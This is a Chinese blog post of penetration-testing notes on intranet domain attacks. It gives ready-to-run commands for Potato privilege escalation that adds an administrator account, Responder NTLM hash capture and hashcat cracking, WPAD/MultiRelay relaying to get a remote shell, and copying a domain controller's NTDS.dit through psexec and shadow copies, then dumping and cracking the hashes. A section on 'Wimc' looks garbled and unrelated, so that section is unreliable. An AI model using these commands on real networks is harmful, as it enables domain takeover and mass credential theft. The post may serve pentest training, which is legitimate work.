devbox
我家自动化
这个屌丝很懒,什么也没留下!
关注作者
热门标签
热门文章
当前位置:   article > 正文

内网渗透-跨域环境渗透-2_内网渗透赛题跨域

作者:我家自动化 | 2024-07-22 04:09:43

内网渗透赛题跨域

目录

内网渗透-跨域环境渗透-2

热土豆提权

Wimc连接执行命令

Responder 密码抓取

WPAD提权

提取域控的NTDS hash文件

内网渗透-跨域环境渗透-2

热土豆提权
这个是提升本地权限的,不是提域控!

  1. 总结:
  2.  
  3. Potato.exe -ip 需要提权的IP -disable exhaust true -cmd "C:\Windows\System32\cmd.exe /K net user potato 123.com /add &&net localgroup administrators potato /add"
  4.  
  5. 调用exe执行程序,-ip后面加上需要提权的IP;-disable exhaust 后面改成 true ;-cmd 调用cmd.exe程序,然后创建一个potato用户,密码为 123.com ,并且加入到管理员组里面!
Wimc连接执行命令

  1. 1. **打开命令行终端**:打开命令提示符或 PowerShell 终端,以便执行命令。
  2. 2. **连接到 WIMC**:在命令行中输入以下命令来连接到 WIMC:
  3.    ```
  4.    wimc.exe /CONNECT /WimFilePath:<WIM文件路径>
  5.    ```
  6.    替换 `<WIM文件路径>` 为您想要连接的 WIM 文件的完整路径。
  8. 3. **执行命令**:一旦连接成功,您可以在 WIMC 终端中执行各种命令。例如,您可以运行以下命令之一:
  9.    - `APPLY`:将映像应用到指定目标。
  10.    - `RENAME`:重命名映像中的项目。
  11.    - `COMMIT`:将更改保存到映像中。
  12.    - `UNMOUNT`:卸载已挂载的映像。
Responder 密码抓取

  1. 总结:
  3. 1、首先,浏览器在正常情况下会存在自动检测代理的设置,我们只需要使用responder监听这个网口就行!
  5. 2、responder -I 网卡名称
  7. 3、得到加密的hash密文。如果是windows默认的登录密文,是以NTLM加密的格式!
  9. 4、利用hashcat破解即可!
  10. hashcat -a 0 -m 5600 hash.txt dic.txt --force

WPAD提权

  1. 总结:
  3. 1、WPAD提权就是在responder的基础上进行的!
  4. vi /usr/share/responder/Responder.conf 
  5. 修改配置文件  把SMB和HTTP都改成OFF
  7. 2、修改配置文件
  8. cd /usr/share/responder/tools
  9. python RunFinger.py -i IP
  10. 在tools中利用检测脚本,来检测哪些可以进行攻击
  12. 3、在第一个终端上,开启responder: python Responder.py -l eth0
  13. 在第二个终端上,运行Multirelay.py脚本: python MultiRelay.py -t 可攻击的主机IP -U ALL
  15. 4、只要攻击目标任意登录网站,我们即可获取到对方的cmd命令窗口
提取域控的NTDS hash文件

  1. 总结:(自己带入IP)
  3. 1、psexec/accepteula 设置psexec接受模式
  4. net use\192.168.3.130\ipc$ "1234.com"/user:"cracer\administrator" : 与域控建立一个空链接
  6. 2、查看域控是否建立卷影副本,将文件保存到本地查看
  7. psexec \\192.168.3.130 -u "cracer\administrator" -p "1234.com" -h cmd /c"vssadmin list shadows
  8. >>\192.168.3.132\c$\test\out.txt"
  10. 3、如果没有,我们就手工建立一个
  11. psexec \\192.168.3.130 -u cracer\administrator -p "1234.com" -h cmd /c "vssadmin create shadow /for=c:
  12. >>192.168.3.132\c$\test\louts.txt"
  14. 4、将NTDS文件拷贝到本地服务器
  15. psexec \\192.168.3.130 -u "cracer\administrator" -p "1234.com" -h cmd /c "copy\\?\GLOBALROOT \Device\Harddisk\VolumeshadowCopy1\windows\ntds\ntds.dit \\192.168.3.132\c$\test\"
  17. 5、删除卷影副本
  18. vssadmin delete shadows /for=c:/quiet
  20. 如果执行psexec报错
  21. Psexec \\192.168.8.100 -u cracer\administrator -p "1234.com" -h cmd /c "vssadmin create shadow /for=c: >> \\192.168.8.135\test\out.txt" /accepteula
  23. 尝试一下命令
  24. psexec /accepteula \\192.168.8.100 -u cracer\administrator -p "1234.com" -h cmd /c "vssadmin create shadow /for=c: >>\\192.168.8.135\test\out.txt"
  26. 6、读取NTDS文件hash内容
  27. 使用impacket工具
  28. ./secretsdump.py -system /root/SYSTEM -ntds /root/ntds.dit -user-status local
  30. 7、hashcat暴力破解即可
  31. hashcat -a 0 -m 1000 win.hash dic.txt -o winpass.list
  33. -a 0 :表示字典爆破
  34. -m 1000 :加密类型是NTML类型
  35. win.hash : window hash密码
  36. dic.txt : 字典
  37. -o winpass.txt 表示将结果输出到 winpass.txt文件中
 

仅供参考
 


                

        声明:本文内容由网友自发贡献,转载请注明出处:【wpsshop博客】
推荐阅读
Copyright ©  2003-2013 www.wpsshop.cn  版权所有,并保留所有权利。